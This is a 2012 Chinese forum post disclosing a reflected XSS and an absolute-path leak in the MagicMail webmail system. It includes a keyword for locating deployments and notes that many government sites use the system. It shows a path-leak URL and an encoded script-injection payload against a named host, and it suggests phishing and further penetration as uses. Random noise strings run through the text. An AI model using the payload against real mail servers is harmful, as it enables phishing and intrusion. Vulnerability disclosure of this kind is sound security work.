找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2128|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞8 j, D- n6 `. G- G1 D9 H( K$ [, L

6 {4 c: _0 n% u* Z3 n- ]7 Q* u $ T# s& b  X" C( }: {7 t  E
包含  一个反射性XSS  以及  绝对路径泄漏7 C4 g6 ~1 E% K" `
看了看 貌似全部是linux的。
( p) l  Y7 s' `9 n, y4 _* L: M 1 O& ^0 F# e, Z- `) A0 t& Q1 \4 p& [
关键字:迈捷邮件系统 by MagicMail9 d' T( {  D! g2 |* Z, ~

: h  p' w# K6 W2 s, C可以看到很多政府网站都用这个邮件系统0 V1 {* b1 {5 A: i  M: K; [
6 V/ G" @- ]& J  m0 U* y
绝对路径 http://madman.in/index.php?login_type=declare&language=
6 I) {7 G( Z( G8 ~# l7 Y0 T
+ Y& {, G4 Q! J
9 L2 Q1 ~* U* m/ Q
6 U5 z, f+ \- ^/ q, j0 |8 qXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E! o3 g/ _* `! e3 h0 A2 Z/ U5 P* R
5 E4 q! j4 h' M$ I8 Q1 k0 O
# K9 Z( q4 E9 f' e/ t  m
/ o! J, s$ U- s6 a. v1 m2 m4 u  v
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
5 a( f/ D* I5 u* z+ Z) g 5 T  l3 k9 R+ o* R4 i7 r' K4 \
修复方案:看官方补丁吧。
( N" K: {, v* s. i0 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表